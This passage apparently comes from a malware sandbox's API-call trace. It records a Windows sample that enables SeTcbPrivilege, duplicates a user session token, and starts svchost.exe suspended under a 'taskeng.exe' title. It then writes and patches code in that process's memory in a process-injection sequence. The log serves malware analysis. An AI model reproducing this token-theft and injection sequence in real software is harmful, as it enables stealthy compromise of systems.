SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), pSid2=0x4eeda0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1 [0240.696] CloseHandle (hObject=0x10c) returned 1 [0240.696] LoadLibraryA (lpLibFileName="wtsapi32") returned 0x75950000 [0240.799] GetProcAddress (hModule=0x75950000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x0 [0240.800] GetProcAddress (hModule=0x75950000, lpProcName="WTSQueryUserToken") returned 0x75951f81 [0240.800] GetProcAddress (hModule=0x75950000, lpProcName="WTSFreeMemory") returned 0x75951b65 [0240.800] GetProcAddress (hModule=0x75950000, lpProcName="WTSEnumerateSessionsA") returned 0x75954023 [0240.800] GetCurrentProcess () returned 0xffffffff [0240.800] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x28dab8 | out: TokenHandle=0x28dab8*=0x10c) returned 1 [0240.800] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeTcbPrivilege", lpLuid=0x28da78 | out: lpLuid=0x28da78*(LowPart=0x7, HighPart=0)) returned 1 [0240.801] AdjustTokenPrivileges (in: TokenHandle=0x10c, DisableAllPrivileges=0, NewState=0x28da74*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x7, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x28da84, ReturnLength=0x28dac0 | out: PreviousState=0x28da84, ReturnLength=0x28dac0) returned 1 [0240.801] WTSEnumerateSessionsA (in: hServer=0x0, Reserved=0x0, Version=0x1, ppSessionInfo=0x28daac, pCount=0x28dab4 | out: ppSessionInfo=0x28daac, pCount=0x28dab4) returned 1 [0241.038] WTSFreeMemory (pMemory=0x4f7ed8) [0241.038] RevertToSelf () returned 1 [0241.038] WTSQueryUserToken (SessionId=0x1, phToken=0x28da70*=0xffffffff) returned 1 [0241.039] DuplicateTokenEx (in: hExistingToken=0x110, dwDesiredAccess=0x2000000, lpTokenAttributes=0x0, ImpersonationLevel=0x1, TokenType=0x1, phNewToken=0x28dab0 | out: phNewToken=0x28dab0*=0x120) returned 1 [0241.039] CloseHandle (hObject=0x110) returned 1 [0241.039] AdjustTokenPrivileges (in: TokenHandle=0x10c, DisableAllPrivileges=0, NewState=0x28da84, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0241.039] CloseHandle (hObject=0x10c) returned 1 [0241.039] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x120, dwFlags=0x0, pszPath=0x28db3c | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0x0 [0241.051] CloseHandle (hObject=0x120) returned 1 [0241.051] lstrcmpiW (lpString1="C:\\Users\\aETAdzjz\\AppData\\Roaming", lpString2="C:\\Users\\aETAdzjz\\AppData\\Roaming") returned 0 [0241.054] VirtualAlloc (lpAddress=0x0, dwSize=0x4176, flAllocationType=0x3000, flProtect=0x40) returned 0x6d0000 [0241.055] VirtualAlloc (lpAddress=0x10000000, dwSize=0x7000, flAllocationType=0x2000, flProtect=0x40) returned 0x10000000 [0241.055] VirtualAlloc (lpAddress=0x10000000, dwSize=0x268, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000 [0241.055] VirtualProtect (in: lpAddress=0x10000000, dwSize=0x268, flNewProtect=0x2, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x4) returned 1 [0241.055] VirtualAlloc (lpAddress=0x10001000, dwSize=0x290a, flAllocationType=0x1000, flProtect=0x40) returned 0x10001000 [0241.056] VirtualAlloc (lpAddress=0x10004000, dwSize=0x424, flAllocationType=0x1000, flProtect=0x40) returned 0x10004000 [0241.056] VirtualAlloc (lpAddress=0x10005000, dwSize=0x78, flAllocationType=0x1000, flProtect=0x40) returned 0x10005000 [0241.056] VirtualAlloc (lpAddress=0x10006000, dwSize=0x1e0, flAllocationType=0x1000, flProtect=0x40) returned 0x10006000 [0241.056] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x290a, flNewProtect=0x20, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x40) returned 1 [0241.056] VirtualProtect (in: lpAddress=0x10004000, dwSize=0x424, flNewProtect=0x2, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x40) returned 1 [0241.056] VirtualProtect (in: lpAddress=0x10005000, dwSize=0x78, flNewProtect=0x4, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x40) returned 1 [0241.056] VirtualProtect (in: lpAddress=0x10006000, dwSize=0x1e0, flNewProtect=0x2, lpflOldProtect=0x28e300 | out: lpflOldProtect=0x28e300*=0x40) returned 1 [0241.057] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x13e0000 [0241.057] Wow64DisableWow64FsRedirection (in: OldValue=0x28dec8 | out: OldValue=0x28dec8*=0x0) returned 1 [0241.057] GetSystemDirectoryW (in: lpBuffer=0x28ded0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0241.057] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x13de22d*(cb=0x44, lpReserved="", lpDesktop="", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x4, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28e0e0 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe", lpProcessInformation=0x28e0e0*(hProcess=0x12c, hThread=0x120, dwProcessId=0x9b4, dwThreadId=0x97c)) returned 1 [0241.060] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x40) returned 0x13f0000 [0241.061] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32.dll", BaseAddress=0x28e268 | out: BaseAddress=0x28e268*=0x0) returned 0xc0000018 [0241.062] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernelbase.dll", BaseAddress=0x28e270 | out: BaseAddress=0x28e270*=0x1400000) returned 0x0 [0241.066] NtCreateEvent (in: EventHandle=0x28e2a8, DesiredAccess=0x1f0003, ObjectAttributes=0x0, EventType=0x1, InitialState=0 | out: EventHandle=0x28e2a8*=0x144) returned 0x0 [0241.066] NtCreateEvent (in: EventHandle=0x28e2b0, DesiredAccess=0x1f0003, ObjectAttributes=0x0, EventType=0x1, InitialState=0 | out: EventHandle=0x28e2b0*=0x140) returned 0x0 [0241.066] NtDuplicateObject (in: SourceProcessHandle=0xffffffffffffffff, SourceHandle=0x144, TargetProcessHandle=0x12c, TargetHandle=0x28e1c8, DesiredAccess=0x1f0000, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x28e1c8*=0x4) returned 0x0 [0241.066] NtDuplicateObject (in: SourceProcessHandle=0xffffffffffffffff, SourceHandle=0x140, TargetProcessHandle=0x12c, TargetHandle=0x28e1d0, DesiredAccess=0x1f0000, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x28e1d0*=0x8) returned 0x0 [0241.066] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e168*=0x0, ZeroBits=0x0, RegionSize=0x28e118*=0x220, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e168*=0x50000, RegionSize=0x28e118*=0x1000) returned 0x0 [0241.067] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x50000, Buffer=0x100035d0*, NumberOfBytesToWrite=0x220, NumberOfBytesWritten=0x28e170 | out: Buffer=0x100035d0*, NumberOfBytesWritten=0x28e170*=0x220) returned 0x0 [0241.067] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e168*=0x0, ZeroBits=0x0, RegionSize=0x28e118*=0x48, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e168*=0x60000, RegionSize=0x28e118*=0x1000) returned 0x0 [0241.067] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28e1c8*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28e170 | out: Buffer=0x28e1c8*, NumberOfBytesWritten=0x28e170*=0x48) returned 0x0 [0241.067] NtQueryInformationProcess (in: ProcessHandle=0x12c, ProcessInformationClass=0x0, ProcessInformation=0x28dce8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x28dce8, ReturnLength=0x0) returned 0x0 [0241.067] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x7fffffdd000, Buffer=0x28de68, NumberOfBytesToRead=0x2c8, NumberOfBytesRead=0x28e160 | out: Buffer=0x28de68*, NumberOfBytesRead=0x28e160*=0x2c8) returned 0x0 [0241.067] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xffc20000, Buffer=0x28dd18, NumberOfBytesToRead=0x40, NumberOfBytesRead=0x28e168 | out: Buffer=0x28dd18*, NumberOfBytesRead=0x28e168*=0x40) returned 0x0 [0241.068] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xffc200e8, Buffer=0x28dd58, NumberOfBytesToRead=0x108, NumberOfBytesRead=0x28e170 | out: Buffer=0x28dd58*, NumberOfBytesRead=0x28e170*=0x108) returned 0x0 [0241.068] NtProtectVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e138*=0xffc2246c, NumberOfBytesToProtect=0x28e168, NewAccessProtection=0x40, OldAccessProtection=0x28e160 | out: BaseAddress=0x28e138*=0xffc22000, NumberOfBytesToProtect=0x28e168, OldAccessProtection=0x28e160*=0x20) returned 0x0 [0241.068] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xffc2246c, Buffer=0x28e198*, NumberOfBytesToWrite=0x16, NumberOfBytesWritten=0x28e270 | out: Buffer=0x28e198*, NumberOfBytesWritten=0x28e270*=0x16) returned 0x0 [0241.068] NtClearEvent (EventHandle=0x140) returned 0x0 [0241.068] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.068] NtResumeThread (in: ThreadHandle=0x120, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0241.068] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.085] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e028*=0x140000000, ZeroBits=0x0, RegionSize=0x28e118*=0x39000, AllocationType=0x2000, Protect=0x40 | out: BaseAddress=0x28e028*=0x140000000, RegionSize=0x28e118*=0x39000) returned 0x0 [0241.087] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e0b0*=0x140000000, ZeroBits=0x0, RegionSize=0x28e0c8*=0x400, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e0b0*=0x140000000, RegionSize=0x28e0c8*=0x1000) returned 0x0 [0241.087] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140000000, Buffer=0x4fb4d0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x28e030 | out: Buffer=0x4fb4d0*, NumberOfBytesWritten=0x28e030*=0x400) returned 0x0 [0241.087] NtProtectVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e0d8*=0x140000000, NumberOfBytesToProtect=0x28e0b8, NewAccessProtection=0x2, OldAccessProtection=0x28e268 | out: BaseAddress=0x28e0d8*=0x140000000, NumberOfBytesToProtect=0x28e0b8, OldAccessProtection=0x28e268*=0x4) returned 0x0 [0241.087] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e050*=0x140001000, ZeroBits=0x0, RegionSize=0x28e150*=0x28a00, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140001000, RegionSize=0x28e150*=0x29000) returned 0x0 [0241.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x28a00, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x1470000, RegionSize=0x28e0e8*=0x29000) returned 0x0 [0241.090] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140001000, Buffer=0x1470000*, NumberOfBytesToWrite=0x28a00, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dfd8*=0x28a00) returned 0x0 [0241.092] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x1470000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0241.093] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140001000, Buffer=0x4fb8d0*, NumberOfBytesToWrite=0x28a00, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x4fb8d0*, NumberOfBytesWritten=0x28dfd8*=0x28a00) returned 0x0 [0241.095] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e050*=0x14002a000, ZeroBits=0x0, RegionSize=0x28e150*=0x8a00, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x14002a000, RegionSize=0x28e150*=0x9000) returned 0x0 [0241.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x8a00, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x1470000, RegionSize=0x28e0e8*=0x9000) returned 0x0 [0241.096] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a000, Buffer=0x1470000*, NumberOfBytesToWrite=0x8a00, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dfd8*=0x8a00) returned 0x0 [0241.096] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x1470000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0241.097] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a000, Buffer=0x5242d0*, NumberOfBytesToWrite=0x8a00, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x5242d0*, NumberOfBytesWritten=0x28dfd8*=0x8a00) returned 0x0 [0241.097] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e050*=0x140033000, ZeroBits=0x0, RegionSize=0x28e150*=0xda0, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140033000, RegionSize=0x28e150*=0x1000) returned 0x0 [0241.097] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0xda0, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x1470000, RegionSize=0x28e0e8*=0x1000) returned 0x0 [0241.097] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140033000, Buffer=0x1470000*, NumberOfBytesToWrite=0xda0, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dfd8*=0xda0) returned 0x0 [0241.097] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x1470000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0241.098] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140033000, Buffer=0x52ccd0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x52ccd0*, NumberOfBytesWritten=0x28dfd8*=0x400) returned 0x0 [0241.098] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e050*=0x140034000, ZeroBits=0x0, RegionSize=0x28e150*=0x2200, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140034000, RegionSize=0x28e150*=0x3000) returned 0x0 [0241.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x2200, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x1470000, RegionSize=0x28e0e8*=0x3000) returned 0x0 [0241.098] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140034000, Buffer=0x1470000*, NumberOfBytesToWrite=0x2200, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dfd8*=0x2200) returned 0x0 [0241.099] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x1470000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0241.099] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140034000, Buffer=0x52d0d0*, NumberOfBytesToWrite=0x2200, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x52d0d0*, NumberOfBytesWritten=0x28dfd8*=0x2200) returned 0x0 [0241.099] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e050*=0x140037000, ZeroBits=0x0, RegionSize=0x28e150*=0x800, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140037000, RegionSize=0x28e150*=0x1000) returned 0x0 [0241.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x800, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x1470000, RegionSize=0x28e0e8*=0x1000) returned 0x0 [0241.099] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140037000, Buffer=0x1470000*, NumberOfBytesToWrite=0x800, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dfd8*=0x800) returned 0x0 [0241.100] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x1470000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0241.100] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140037000, Buffer=0x52f2d0*, NumberOfBytesToWrite=0x800, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x52f2d0*, NumberOfBytesWritten=0x28dfd8*=0x800) returned 0x0 [0241.100] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e050*=0x140038000, ZeroBits=0x0, RegionSize=0x28e150*=0x600, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x28e050*=0x140038000, RegionSize=0x28e150*=0x1000) returned 0x0 [0241.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e088*=0x0, ZeroBits=0x0, RegionSize=0x28e0e8*=0x600, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e088*=0x1470000, RegionSize=0x28e0e8*=0x1000) returned 0x0 [0241.100] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140038000, Buffer=0x1470000*, NumberOfBytesToWrite=0x600, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dfd8*=0x600) returned 0x0 [0241.100] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e0f8*=0x1470000, RegionSize=0x28e128, FreeType=0x8000) returned 0x0 [0241.101] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x140038000, Buffer=0x52fad0*, NumberOfBytesToWrite=0x600, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x52fad0*, NumberOfBytesWritten=0x28dfd8*=0x600) returned 0x0 [0241.101] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x52c520, cbMultiByte=-1, lpWideCharStr=0x28ddb8, cchWideChar=522 | out: lpWideCharStr="msvcrt.dll") returned 11 [0241.101] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28e008*=0x0, ZeroBits=0x0, RegionSize=0x28dd98*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e008*=0x20000, RegionSize=0x28dd98*=0x1000) returned 0x0 [0241.101] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x28ddb8*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28e010 | out: Buffer=0x28ddb8*, NumberOfBytesWritten=0x28e010*=0x15) returned 0x0 [0241.102] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28dd70*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28dd90 | out: Buffer=0x28dd70*, NumberOfBytesWritten=0x28dd90*=0x10) returned 0x0 [0241.102] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc48 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc48*=0x48) returned 0x0 [0241.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc38*=0x0, ZeroBits=0x0, RegionSize=0x28dc58*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc38*=0x1470000, RegionSize=0x28dc58*=0x1000) returned 0x0 [0241.102] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28dc18*=0x0, ZeroBits=0x0, RegionSize=0x28dbc8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28dc18*=0xe0000, RegionSize=0x28dbc8*=0x1000) returned 0x0 [0241.102] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28dc20 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28dc20*=0x30) returned 0x0 [0241.102] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28dc40 | out: Buffer=0x28dc88*, NumberOfBytesWritten=0x28dc40*=0x48) returned 0x0 [0241.102] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.102] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.103] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28dc88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dc50 | out: Buffer=0x28dc88*, NumberOfBytesRead=0x28dc50*=0x48) returned 0x0 [0241.103] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dc78*=0xe0000, RegionSize=0x28dc68, FreeType=0x8000) returned 0x0 [0241.103] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28dc70*=0x1470000, RegionSize=0x28dc60, FreeType=0x8000) returned 0x0 [0241.103] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28dd80, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28dd68 | out: Buffer=0x28dd80*, NumberOfBytesRead=0x28dd68*=0x8) returned 0x0 [0241.103] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28dda8*=0x20000, RegionSize=0x28dda0, FreeType=0x8000) returned 0x0 [0241.103] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.104] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c540*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c540*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0241.104] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.104] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.104] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.104] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.104] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.105] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.105] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.105] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.105] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.105] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.105] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.106] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.106] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a2e8, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.106] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x24, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.106] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c558*, NumberOfBytesToWrite=0xc, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c558*, NumberOfBytesWritten=0x28df88*=0xc) returned 0x0 [0241.106] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.106] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.107] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.107] NtWriteVirtualMemory (in: 